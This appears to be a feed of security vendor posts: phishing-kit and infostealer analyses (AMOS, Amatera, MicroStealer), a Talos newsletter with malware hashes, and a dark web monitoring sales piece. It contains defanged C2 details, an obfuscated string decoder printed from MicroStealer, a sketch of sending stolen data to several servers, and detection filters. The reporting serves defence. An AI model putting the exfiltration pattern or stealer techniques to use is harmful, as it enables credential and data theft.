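        email = ", ".join(contact.get("email", []))
        lines.append(f"{name} | {tel} | {email}")
    return "\n".join(lines)

# Placeholder contact data for demonstration.
msg = format_contacts([
    {"name": ["Alice Example"], "tel": ["+1-555-0100"],
     "email": ["alice@example.com"]},
])
```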

User Interface Manipulation

The phishing pages include interface elements designed to convince victims that the image capture process is legitimate.

For example, status messages displayed during execution may include:

  • “Capturing photo”
  • “Sending to server”
  • “Photo sent successfully”

These messages simulate the behavior of legitimate identity verification platforms and help maintain the illusion that the process is part of a valid verification workflow.

Once the image is successfully transmitted, the script terminates the camera stream and resets the interface after a short delay.

Infrastructure Observations

Analysis of the campaign revealed that the phishing pages are primarily hosted under the edgeone.app domain. Multiple variations of phishing pages were observed using similar JavaScript logic and workflow patterns.

The consistent use of the same infrastructure suggests that attackers may be operating a templated phishing kit capable of generating different themed pages while maintaining the same underlying data-collection logic.

Because the image exfiltration occurs through Telegram infrastructure, the phishing pages themselves do not require backend servers, simplifying deployment and enabling rapid rotation of phishing URLs.

Indicators of Potential Generative AI Use in Script Development

During analysis of the phishing framework, researchers observed the use of emojis embedded directly within the script’s message formatting logic. These emojis appear in structured status messages that are assembled and transmitted during the data collection workflow. The use of decorative Unicode symbols within operational code is uncommon in manually written malicious scripts but has increasingly been observed in campaigns that use generative AI tools during development. (see Figure 7)

Figure 7 – Script Fragment Suggesting AI-Assisted Development
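That observation suggests a simple triage heuristic: flag scripts whose operational strings contain emoji-range code points. The sketch below is illustrative only; the Unicode ranges and threshold are assumptions for demonstration, not a production detection rule.

```python
# Triage heuristic sketch: count emoji-range code points in script text.
# Ranges and threshold are illustrative, not a vetted detection signature.
EMOJI_RANGES = [
    (0x1F300, 0x1FAFF),  # symbols, pictographs, emoji
    (0x2600, 0x27BF),    # miscellaneous symbols and dingbats
]

def count_emoji(text: str) -> int:
    return sum(
        1 for ch in text
        if any(lo <= ord(ch) <= hi for lo, hi in EMOJI_RANGES)
    )

def looks_ai_decorated(script_text: str, threshold: int = 3) -> bool:
    """Flag scripts with several decorative symbols in status strings."""
    return count_emoji(script_text) >= threshold

# Hypothetical status-message fragment of the kind the report describes.
sample = "status = '\u2705 Photo sent \U0001F4F8 to server \U0001F680'"
```

Such a check would only ever be one weak signal among many; legitimate scripts also use decorative Unicode.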

Targeted Countries and Impersonated Brands

Infrastructure monitoring and phishing URL telemetry analysis indicate that the campaign’s infrastructure is globally accessible. The phishing templates used in this campaign show that the operators impersonate a range of widely recognized consumer platforms and applications. Observed brand impersonation themes include:

  • TikTok – Free followers/engagement rewards
  • Flappy Bird – Game reward or verification workflows
  • Telegram – Account freezing or verification alerts
  • Instagram – Account recovery or follower reward systems
  • Google Chrome / Google Drive – Security verification prompts

Conclusion

Our deep-dive analysis revealed a sophisticated phishing campaign that extends beyond traditional credential theft by harvesting multimedia and device-level data through browser permission abuse.

The campaign attempts to collect photographs, video recordings, audio recordings from microphones, contact details, device information, and approximate location data directly from victims. This operation demonstrates a growing trend where attackers leverage client-side scripting and legitimate web services to collect and transmit sensitive data without relying on traditional command-and-control infrastructure.

Indicators in the script also suggest AI-assisted development, reflecting how threat actors may be using generative AI tools to accelerate the creation of phishing frameworks.

The breadth of information collected increases the potential for identity theft, targeted social engineering, account compromise attempts, and extortion. Organizations should remain cautious about phishing pages that request hardware permissions, such as camera, microphone, or contact access, particularly when originating from untrusted domains.

Cyble’s Threat Intelligence Platforms continuously monitor emerging threats, attacker infrastructure, and malware activity across the dark web, deep web, and open sources. This proactive intelligence empowers organizations with early detection, brand and domain protection, infrastructure mapping, and attribution insights. Altogether, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We recommend that our readers follow these essential cybersecurity best practices, which serve as the first line of defense against attackers:

  • Restrict camera permissions for unknown websites
  • Monitor outbound traffic to api.telegram.org when originating from browser sessions
  • Deploy browser security extensions capable of identifying phishing pages
  • Implement domain monitoring for suspicious infrastructure hosting phishing kits
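The second recommendation above can be prototyped as a proxy-log filter that flags browser-originated requests to api.telegram.org. The tab-separated `user_agent<TAB>host` log format below is an assumption for illustration; adapt the field extraction to your proxy's actual schema.

```python
# Sketch of the api.telegram.org monitoring recommendation as a proxy-log
# filter. Log format (user_agent<TAB>destination_host) is an assumption.
BROWSER_MARKERS = ("Mozilla/", "Chrome/", "Safari/")

def flag_browser_telegram(lines: list) -> list:
    """Return log lines where a browser user agent contacts api.telegram.org."""
    hits = []
    for line in lines:
        try:
            user_agent, host = line.rsplit("\t", 1)
        except ValueError:
            continue  # skip malformed lines
        if host.strip() == "api.telegram.org" and user_agent.startswith(BROWSER_MARKERS):
            hits.append(line)
    return hits

logs = [
    "Mozilla/5.0 (Windows NT 10.0)\tapi.telegram.org",
    "TelegramDesktop/4.8\tapi.telegram.org",   # legitimate desktop client
    "Mozilla/5.0 (X11; Linux)\texample.com",
]
hits = flag_browser_telegram(logs)
```

Note that legitimate Telegram desktop clients also contact this endpoint; the browser user-agent check is what narrows the signal toward in-page exfiltration.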

MITRE ATT&CK® Techniques

Tactic | Technique ID | Procedure
Initial Access | T1566 – Phishing | Phishing pages used to lure victims to malicious verification workflows.
Execution | T1059.007 – JavaScript | Malicious JavaScript executed in the victim’s browser.
Collection | T1125 – Video Capture | Camera access used to capture photos and videos of victims.
Collection | T1123 – Audio Capture | Microphone access used to record the victim’s audio.
Collection | T1005 – Data from Local System | Device information collected from the browser environment.
Collection | T1213 – Data from Information Repositories | Contact details retrieved from the device contact list.
Discovery | T1082 – System Information Discovery | Device and browser information enumeration.
Discovery | T1614 – System Location Discovery | Victim IP and geographic location collected.
Exfiltration | T1567 – Exfiltration Over Web Services | Collected data transmitted to the attacker’s infrastructure.

Indicators of Compromise (IOCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

The post AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data appeared first on Cyble.

Cyble – ​Read More

Face value: What it takes to fool facial recognition

ESET’s Jake Moore used smart glasses, deepfakes and face swaps to ‘hack’ widely-used facial recognition systems – and he’ll demo it all at RSAC 2026

WeLiveSecurity – ​Read More

The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike

Dark web intelligence

In 2026, the cyber threat landscape has become more complex and dangerous than ever. Attackers no longer operate only on the surface web; they now lurk in encrypted networks, underground marketplaces, and anonymous forums across the dark web, where stolen credentials are traded, breaches are planned, and cyberattacks take shape. 

Recent data from Cyble Research and Intelligence Labs (CRIL) shows the scale of this threat. In 2025 alone, Cyble tracked 6,046 global data breach and leak incidents, with sectors such as government and finance among the most targeted. The research has also identified thousands of enterprise credentials circulating on dark web marketplaces, often harvested by infostealer malware and sold to cybercriminals. 

For organizations that want to protect sensitive data, maintain reputation, and reduce operational risk, investing in dark web intelligence and dark web monitoring solutions is no longer optional; it’s a necessity. 

What Is Dark Web Monitoring and Why It Matters in 2026 

Dark web monitoring involves continuous scanning and intelligence gathering from hidden parts of the internet that aren’t indexed by traditional search engines, including TOR, I2P, ZeroNet, and encrypted chat channels. Cybercriminals use these platforms to trade stolen data, discuss exploits, and plan attacks. 

Effective dark web surveillance allows organizations to detect threats early. By identifying stolen credentials, leaked data, and malicious activity before the attacker acts, security teams can reset passwords, notify affected personnel, and fortify defenses, turning reactive security into a proactive advantage. 

How the Dark Web Has Evolved as a Threat Landscape 

Once considered a fringe network, the dark web has become a structured ecosystem for cybercrime. Threat actors collaborate globally with the same levels of sophistication as legitimate enterprises, complete with forums for selling vulnerabilities, reputation systems for traders, and encrypted channels for planning attacks. 

From ransomware kits to stolen databases and insider trading in sensitive corporate data, the dark web now functions as a hub for criminal collaboration and the commercialization of cyberattacks. Organizations that ignore this underground economy risk being blindsided. 

What Kind of Data Ends Up on the Dark Web 

Not all information on the dark web carries the same risk, but much of it is highly sensitive: 

  • Stolen credentials: Email/password combinations, VPN logins 

  • Breached corporate databases: Financial, HR, and client information 

  • Identity documents: Social Security numbers, passports 

  • Internal communications or proprietary IP 

Even seemingly minor leaks, if unnoticed, can be exploited for data breaches. Platforms with data leak monitoring and dark web alerts allow teams to act before these threats escalate. 

How Dark Web Monitoring Works 

Modern dark web monitoring relies on a combination of automated technologies and expert analysis. Tools crawl hidden networks, marketplaces, paste sites, and private forums to collect data. AI and machine learning analyze signals, identify patterns of malicious behavior, and provide cyber threat intelligence in actionable formats. 

Key capabilities include: 

  • Deep web and dark web scanning: Covering TOR, I2P, and other hidden networks 

  • Threat actor tracking: Linking chatter to known malicious entities 

  • Natural Language Processing (NLP): Interpreting unstructured forum text 

  • Actionable alerts: Prioritized intelligence for immediate response 

This ensures organizations can anticipate threats rather than merely respond after an incident. 

Key Features to Look for in a Dark Web Monitoring Solution 

In 2026, an effective platform should offer: 

  • Continuous, real-time scanning 

  • Comprehensive monitoring of marketplaces, forums, and paste sites 

  • Automated alerts with remediation guidance 

  • Integration with existing cybersecurity systems 

  • Reporting for compliance and risk assessment 

  • Threat actor profiling and predictive analytics 

Solutions lacking contextual intelligence or actionable insights are insufficient for modern threat landscapes. 

Cyble Hawk for Advanced Threat Intelligence and Protection 

To counter cyber threats from advanced adversaries, Cyble Hawk represents the next generation of dark web monitoring and threat intelligence. Beyond merely detecting leaks, Cyble Hawk tracks threat actors, uncovers emerging attack trends, and provides actionable insights across cyber and physical domains. 

Key advantages of Cyble Hawk include: 

  • Deep Intelligence Fusion: Integrates open-source and proprietary intelligence for a 360-degree view of threats. 

  • AI & Deep Learning: Identifies threat actors and patterns in real time. 

  • Real-Time Alerts & Rapid Response: Immediate notifications for compromised credentials, breaches, and vulnerabilities. 

  • Incident Response & Resilience: Supports frameworks to continuously strengthen the cybersecurity posture. 

Cyble Hawk doesn’t just monitor; it empowers organizations to detect, respond, and protect against the most advanced cyber threats before they escalate. 

Dark Web Monitoring Across Industries 

Different sectors face unique exposures, and tailored monitoring is critical: 

  • Financial Services: Detect compromised customer databases, prevent fraud schemes 

  • Healthcare: Identify patient data leaks, PHI exposure, and ransomware chatter 

  • Retail & E-Commerce: Monitor credential-stuffing lists, card dumps, and phishing campaigns 

  • Manufacturing & Critical Infrastructure: Track trade-secret exposure and APT activity 

  • Government & Public Sector: Detect contractor data leaks, APT campaigns, and impersonation threats 

Building a Dark Web Monitoring Strategy in 2026 

A robust strategy combines continuous monitoring with proactive response: 

  1. Asset Prioritization: Identify the most critical data, accounts, and intellectual property 

  2. Continuous Intelligence Gathering: Real-time scanning of forums, marketplaces, and paste sites 

  3. Automated, Actionable Alerts: Ensure teams can respond quickly to compromised assets 

  4. Integration with Cybersecurity Infrastructure: Link dark web intelligence with firewalls, identity protection, and incident response tools 

  5. Employee Awareness: Educate staff to recognize phishing and social engineering attempts 

This approach transforms dark web intelligence into a defensive advantage, reducing exposure and operational risk. 

Frequently Asked Questions (FAQs) 

Q.1: What is dark web intelligence? 

Dark web intelligence is information collected from unindexed networks and underground forums to detect threats, leaked data, or compromised credentials. 

Q.2: Can dark web monitoring prevent attacks? 

It doesn’t prevent breaches outright, but early detection of leaks or malicious activity enables mitigation before exploitation. 

Q.3: Who should use dark web monitoring? 

Any organization handling sensitive data, including enterprises, government agencies, and financial institutions. 

Q.4: How does Cyble Hawk enhance monitoring? 

By combining AI, threat actor tracking, and real-time alerts, Cyble Hawk delivers actionable intelligence that allows organizations to detect, respond, and fortify defenses effectively. 

Conclusion 

In 2026, the dark web remains one of the most dynamic and high-risk areas of the cyber threat landscape. Organizations can no longer afford to rely on reactive security. By leveraging advanced monitoring platforms like Cyble Hawk, security teams gain early visibility into compromised data, track threat actors, and respond to risks before they escalate into major incidents. 

Cyble Hawk combines AI-driven intelligence, real-time alerts, and expert threat analysis to help organizations detect threats faster and strengthen their cybersecurity posture. Schedule a personalized demo to see Cyble Hawk in action and learn how it can help protect your organization’s critical assets. 

The post The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike appeared first on Cyble.

Cyble – ​Read More

Cyber fallout from the Iran war: What to have on your radar

The cybersecurity implications of the war in the Middle East extend far beyond the region. Here’s where to focus your defenses.

WeLiveSecurity – ​Read More

AMOS and Amatera disguised as AI agents | Kaspersky official blog

We recently discussed how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they’re on Windows, it’s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.

The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings its own set of risks, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. They type in a search query and are served a sponsored link leading to a malicious installation guide. Let’s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.

The search query

So, a user starts looking for a place to download the Anthropic agent and types something like “Claude Code download” into the search bar. The search engine returns a list of links, with “sponsored links” (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Interestingly, the site itself is built on Squarespace, a legitimate website builder that helps it bypass anti-phishing filters.

Search result examples

Search results with ads in Romania and Brazil

The attackers’ site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real deal, it prompts the user to copy and run a command. However, once executed, it installs not an AI agent but malware. Essentially, this is just another flavor of the ClickFix attack — one that has earned its own nickname: InstallFix.

Malicious website

Malicious site mimicking installation instructions

Claude Code website

Genuine Claude Code site with installation instructions

Malicious payload

Just like with the original Claude Code, the command for macOS attempts to install an application using the curl command-line utility. In reality, it deploys the AMOS spyware — previously described by our experts on Securelist — which was used in a similar past campaign.

In the case of Windows, the malware is installed with the system utility mshta.exe, which executes HTML-based applications, rather than with curl as the genuine Claude Code is. This utility deploys the Amatera infostealer, which harvests browser data, crypto-wallet info, and information from the user folder, and sends it to a remote server at 144{.}124.235.102.

How to keep your company safe

Interest in AI agents continues to grow, and the emergence of new tools and their rising popularity are creating fresh attack vectors. Specifically, attempting to seek out third-party AI tools can not only jeopardize the source code of projects on the victim’s computer but also lead to the compromise of secrets, confidential corporate files, and user accounts.

To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our training platform: Kaspersky Automated Security Awareness. Incidentally, it includes a specialized lesson on the use of AI in corporate environments.

Additionally, we recommend protecting all corporate devices with proven cybersecurity solutions.

We also suggest checking out our previously published article on three approaches to minimizing the risks of using shadow AI.

Kaspersky official blog – ​Read More

This one’s for you, Mom

This one’s for you, Mom

Welcome to this week’s edition of the Threat Source newsletter. 

I am the product of a single parent, my mom, who along with my grandparents helped raise me into the man I am today.  I cannot fathom what it took for my mom, who worked three jobs to put herself through college to be a teacher, to struggle through it. My grandparents did some heavy lifting here, helping with me as a kid as my mom worked long hours and earned her bachelor’s degree.  

I didn’t see as much of my mom as I wanted — but in her third job where she cleaned offices on the weekend, I would often go with her and help. It got me out of the house, let me spend time with my mom, and afterwards we’d have a meal together. Shout out to the Taco Bell dollar menu, which was all we could afford. It took me well into my thirties to understand how important that time we shared was, even as I took out garbage, cleaned bathrooms, and complained the entire time.  

So why am I waxing nostalgic for my childhood janitorial days? Role models. My mom is certainly one. We also recently recognized International Women’s Day here at Talos, and I couldn’t help but think of the sacrifices and hard work my mom did to ensure I had food and clothing and was loved. It caused me to reflect on the women who work in my career space, especially here at Cisco. What parallels exist? What don’t I know about? How can I be an ally? I had previously observed that cybersecurity is a male-dominated field, but I hadn’t really dug into any data to support that. It also made me wonder: What other STEM fields suffered from a lack of, or had successes in, gender diversity?  

So I did some homework to better understand. Some sobering stats: 

Well, that was depressing. I knew it wasn’t great, but geez. 

Even though I’m a bit slow, I did find some good news. There are a lot of fantastic organizations, programs, and scholarships to help women attain skills and get great jobs in STEM, especially in cybersecurity. I’m quite partial to CTFs and competitions in this space — it’s valuable hands-on experience, and having fun hacking stuff in a safe and inclusive space is fantastic. I’m also fond of Women in Cybersecurity (WiCyS). I’ve been fortunate to do WiCyS mentorship here in Cisco, and it was an awesome experience.

Should you find yourself in a position to mentor someone that would add diversity into our career space, do it! It is incredibly rewarding. A diversity of thoughts and lived experiences make us and those we protect safer — which is what we do all day, every day here in Talos.

The one big thing 

On Tuesday, March 10, Talos updated our blog on the developing situation in the Middle East. We continue to monitor the evolving cyber threat landscape associated with the conflict and collect tactics, techniques, and procedures (TTPs); threat actor identifiers; and other intelligence to help inform defensive efforts and maintain situational awareness. 

Though select hacktivist operations are highlighted in the blog, hundreds of attacks have been claimed by numerous collectives since the beginning of the conflict. Talos cautions against accepting these claims at face value, emphasizing that defenders should independently verify them since older leaks and previously public information can be used to influence perceptions.

Why do I care? 

Cyber operations are likely to play a supporting but strategically significant role in the ongoing conflict. Iranian-aligned groups are employing network-based intrusions to target adversary infrastructure and advance strategic objectives.  

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Disruptive cyberattacks against organizations in a target country may unintentionally spill over to organizations in other countries. A more active hacktivist landscape inherently increases the threat of DDoS and website defacement attacks, as hundreds of attacks have been claimed by numerous collectives since the beginning of the conflict. 

So now what? 

Organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for destructive malware. Consider minimizing the amount and sensitivity of data that is available to external parties. To improve defenses against DDoS attacks, ensure your organization has a business continuity plan in place, assess external attack surfaces, and confirm that critical systems have healthy, usable backups. For website defacement/redirect protection, ensure that websites are protected against the most commonly exploited security vulnerabilities.  

Defenders should ensure security fundamentals are being adhered to, such as robust patching for known vulnerabilities and requiring multi-factor authentication (MFA) for remote access and on critical services. Network security teams should proactively monitor their traffic for APT-associated IP addresses and implement hardening guidelines.  

We will update this blog with IOCs and further developments accordingly. 

Top security headlines of the week 

Russian government hackers targeting Signal and WhatsApp users, Dutch spies warn 
Two agencies accused “Russian state actors” of using phishing and social engineering techniques — rather than malware — to take over accounts on the two messaging apps. (TechCrunch

FBI investigating “suspicious” cyber activities on critical surveillance network 
The FBI has identified a suspected cybersecurity incident on a sensitive network used to manage wiretaps and intelligence surveillance warrants. Officials are working to determine the seriousness of the incident. (CNN

TriZetto confirms year-long hack of its network exposed records on 3.4M people 
Until recently, the total number of impacted individuals was unknown. According to a recent filing with the Office of the Maine Attorney General, the breach likely initially occurred on November 19, 2024. (HealthExec

“InstallFix” attacks spread fake Claude Code sites 
A fresh cyber attack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces. (Dark Reading

ClickFix attack uses Windows Terminal to evade detection 
Victims are instructed to open Windows Terminal directly, instead of relying on the Windows Run dialog. The new approach, observed in the wild in February, allows attackers to bypass protections designed to prevent Run dialog abuse. (Dark Reading)

Can’t get enough Talos? 

It’s the B+ Team: Matt Olney returns 
Matt is back to talk with the crew about the most random things, including TikTok diagnosing us with ADHD, K-Pop Demon Hunters, ransomware in hospitals (the serious bit), attacker use of AI, and why 1999-era tricks are still undefeated.

Modernizing your threat hunt 
David Bianco joins Amy to explore the evolution of the PEAK Threat Hunting framework and talk through how security teams can modernize their approach to identifying risks before they escalate.

Spinning complex ideas into clear docs with Kri Dontje 
Kri and Amy discuss the importance of consistency, accuracy, and accessibility in documentation; how to get the most out of a subject matter expert-technical writer relationship; and the surprising connection between weaving and binary code.

Agentic AI security 
This blog emphasizes the importance of robust risk management and threat modeling to defend against both internal operational errors and potential malicious exploitation. 


Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: https_2915b3f8b703eb744fc54c81f4a9c67f.exe 
Detection Name: Win.Worm.Coinminer::1201  

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: d4aa3e7010220ad1b458fac17039c274_64_Dll.dll 
Detection Name: Auto.90B145.282358.in02  

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
MD5: aac3165ece2959f39ff98334618d10d9 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe 
Detection Name: W32.Injector:Gen.21ie.1201  

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
MD5: 41444d7018601b599beac0c60ed1bf83 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js 
Detection Name: W32.38D053135D-95.SBX.TG 

SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
MD5: a2cf85d22a54e26794cbc7be16840bb1 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
Example Filename: VID001.exe 
Detection Name: W32.5E6060DF7E-100.SBX.TG

Cisco Talos Blog – ​Read More

MicroStealer Analysis: A Fast-Spreading Infostealer with Limited Detection 

Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay limited? 

In recent investigations, ANY.RUN researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. Early activity points to distribution through compromised or impersonated accounts, with education and telecommunications among the affected sectors.

MicroStealer is more than just another stealer. It targets browser credentials, session data, screenshots, and wallet files while using a layered NSIS → Electron → Java delivery chain that can slow confident detection.

Let’s break down how MicroStealer operates and how its behavior can be uncovered early in ANY.RUN’s interactive sandbox, helping teams shorten time to verdict, reduce unnecessary escalations, and prevent credential theft from becoming a business impact.

Key Takeaways 

  • MicroStealer exposes a broader business risk by stealing browser credentials, active sessions, and other sensitive data tied to corporate access.
  • The malware uses a layered NSIS → Electron → JAR chain that helps it stay hidden longer and slows confident detection.
  • Distribution through compromised or impersonated accounts makes the initial infection look more trustworthy to victims.
  • For enterprises, the main danger is delayed visibility while identity compromise and data theft are already in progress. 

The Business Risk Behind MicroStealer 

For security leaders, MicroStealer reflects a threat designed to steal identity data, maintain access, and increase the chance of a wider enterprise incident. 

  • Corporate identities become exposed: Browser credential theft and session cookie extraction compromise SaaS accounts, internal portals, VPN sessions, and cloud administration access tied to employee browsers.
  • Privilege expansion becomes possible: Access to authentication tokens, browser sessions, and system credentials creates a path from a single compromised endpoint to privileged accounts and internal systems.
  • Stealthy access persists longer: Stolen session data allows attackers to operate through valid user sessions, blending malicious activity with legitimate traffic across enterprise services.
  • Data loss begins immediately: Screenshots, browser data, wallet files, and application artifacts are collected and exfiltrated through multiple channels, ensuring sensitive information leaves the environment quickly.
  • Attackers gain reconnaissance value: Profiling of Discord and Steam accounts provides intelligence about the victim’s activity, helping attackers prioritize higher-value targets.

For CISOs, MicroStealer highlights a familiar enterprise risk: attackers can use stolen identities, stealthy delivery methods, and fast data theft to stay undetected, expand access inside the environment, and increase the risk of operational, compliance, and reputational damage.


Timeline of Observed MicroStealer Activity 

MicroStealer activity was first observed on December 14 in the following analysis session inside the ANY.RUN sandbox:

Check analysis session  

First observed analysis session with MicroStealer 

Over the following weeks, its activity continued to grow; at the time of analysis, MicroStealer had already been identified in more than 40 sandbox sessions in less than one month, indicating an active distribution phase. 

However, despite the malware’s growing popularity, security vendors are still not detecting MicroStealer.

Security vendors don’t flag the file as malicious 

The highest concentration of detections was observed between January 7 and January 11, when 20 sandbox sessions containing MicroStealer activity were recorded. This suggests that MicroStealer is gaining traction. 



When visiting the malicious resource, the victim is presented with a visually appealing website: 

Attacker-controlled website analyzed inside ANY.RUN sandbox 

When the “Download Now” button is clicked, a JavaScript file is executed. It downloads a malicious file from Dropbox and sends the victim’s external IP address, region, OS version, and time zone to a Discord server.

This basic information serves as a beacon. However, if the downloaded malicious file is executed, MicroStealer steals data from web browser profiles, takes desktop screenshots, and sends the collected data as an archive to two destinations: a Discord server and a newly registered exfiltration server.

In this way, the stealer increases the chances that the stolen data will reach the attacker even if one of the servers becomes unavailable for some reason.
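This dual-destination pattern can be sketched as a small helper (an illustrative reconstruction, not the malware's actual code; `send` stands in for whatever transport is used, such as a webhook POST):

```javascript
// Illustrative sketch of the dual-destination exfiltration pattern described
// above. Fire the upload at every endpoint in parallel; Promise.allSettled
// never rejects, so one dead server cannot abort the others.
async function exfiltrate(payload, endpoints, send) {
  const results = await Promise.allSettled(
    endpoints.map((url) => send(url, payload))
  );
  // The exfiltration "succeeds" if at least one destination accepted the data.
  return results.some((r) => r.status === "fulfilled");
}
```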

MicroStealer also embeds its own name in the User-Agent header of its first GET request to Discord:

User-Agent: MicroStealer/1.0 
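That hardcoded header gives defenders a trivially matchable network artifact. A minimal sketch of a log filter, assuming the proxy log exposes the raw User-Agent value as a string:

```javascript
// Hedged example: flag traffic carrying MicroStealer's hardcoded User-Agent.
// The log schema is an assumption; `userAgent` is just the raw header value.
const isMicroStealerUA = (userAgent) => /^MicroStealer\/1\.0$/.test(userAgent);
```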

In addition to Dropbox, there were also cases where the sample was downloaded from other sources, for example: cdn[.]discordapp[.]com 

Victimology and Targeting 

Analysis of MicroStealer-related submissions to the ANY.RUN sandbox shows that 50% of observed sample uploads originated from the United States and Germany, pointing to notable activity in these regions.

Based on the observed cases, the education and telecommunications sectors appear to face elevated exposure. 

threatName:"microstealer" 

ANY.RUN’s TI Lookup shows the risk score by industry and submission countries 

The distribution pattern also suggests that threat actors rely on compromised or impersonated accounts to deliver the malware, increasing the likelihood that victims will trust the source and execute the payload. 



Inside the MicroStealer Execution Chain 

The ANY.RUN sandbox provides a clear overview of the MicroStealer execution chain and detects the malware’s primary behavioral patterns, making it easier to begin the analysis.

Running the MicroStealer Sample in ANY.RUN 

To better understand how each component operates, we proceed to static analysis. The first stage in the infection chain is RocobeSetup.exe.

RocobeSetup is an NSIS (Nullsoft Scriptable Install System) installer, which becomes immediately apparent when analyzing the binary in Detect It Easy (DIE).

Sample Analysis in Detect It Easy 

Since the installer has an archive structure, its contents can be inspected without executing the malware or using specialized analysis tools.

Analysis of the NSIS Installer Contents 

Among the files, the next stage in the infection chain can already be identified: Game Launcher.exe. The analysis then moves on to the other directories within the archive.

Inside the resource directory, two ASAR (Atom Shell Archive) archives can be found: app.asar and app.asar.unpacked. The latter contains the main stealer module, an executable JAR file, along with a Java Runtime Environment (JRE) packaged inside the archive module.zip.

Analysis of the ASAR archive contents 

After unpacking app.asar using a standard ASAR unpacker, a small Node.js component becomes visible.

Analysis and Unpacking of app.asar 

Static Analysis of the Node.js Component 

At this stage, the focus shifts to the main script located in index.js. Opening it in a text editor immediately reveals multiple signs of obfuscation, including compressed strings, constants grouped into arrays, flattened control flow, and dead code.

The next step is to analyze the string handling logic, since strings are used extensively throughout the program and can help reconstruct the malware’s execution flow.

To understand how the malware retrieves the strings it needs, let us examine the following code block:

var wa4Ibtk; 
(function () { 
function* mjAYxpv(mjAYxpv, JbBfOsP, PXuU6i, Tky9na = { 
rwLytg: {} 
}) { 
while (mjAYxpv + JbBfOsP + PXuU6i !== 124) with(Tky9na.bWzSK3 || Tky9na) switch (mjAYxpv + JbBfOsP + PXuU6i) { 
default: 
[Tky9na.rwLytg.sZF0hF, Tky9na.rwLytg.MtsKAJ, Tky9na.rwLytg.AggjBE] = [-57, -181, 104]; 
Tky9na.bWzSK3 = Tky9na.TDHlw5, mjAYxpv += -134, JbBfOsP += 290, PXuU6i += 145; 
break;
case 162: 
case PXuU6i - -62: 
Tky9na.bWzSK3 = Tky9na.Q6N0rF, mjAYxpv += -340, JbBfOsP += 290; 
break;
case Tky9na.rwLytg.AggjBE + -186: 
Tky9na.bWzSK3 = Tky9na.IQz1SBX, mjAYxpv += -211, JbBfOsP += 290; 
break;
case -216: 
case 9: 
case -78: 
case 60: 
case PXuU6i - 190: 
case -96: 
[Tky9na.rwLytg.sZF0hF, Tky9na.rwLytg.MtsKAJ, Tky9na.rwLytg.AggjBE] = [-62, 172, 231]; 
rwLytg.DDXChP = "ɡⱃ¼ǀ⼡砫\ư෠祘ഀΠ䌡渡洀ં䊡䚐ɰଊ‥<䜀ྀᕩö (...truncated)"; 
rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP); 
Tky9na.bWzSK3 = Tky9na.rwLytg, mjAYxpv += -83, JbBfOsP += 227, PXuU6i += -441; 
break;
case 40: 
case 235: 
case mjAYxpv - -42: 
Tky9na.rwLytg.zxxO0HE = tuWPH66.split("|"); 
return oh5cES = !0, wa4Ibtk = function (mjAYxpv) { 
return zxxO0HE[mjAYxpv] 
} 
} 
} 
var oh5cES, JbBfOsP = mjAYxpv(-31, -159, 415).next().value; 
if (oh5cES) { 
return JbBfOsP 
} 
})(); 

As we can see, all strings are combined and compressed using the LZ-String library into a single sequence of Unicode characters, stored in the variable DDXChP (for example, “ɡⱃ¼ǀ⼡砫ư෠祘ഀΠ䌡渡洀…”).

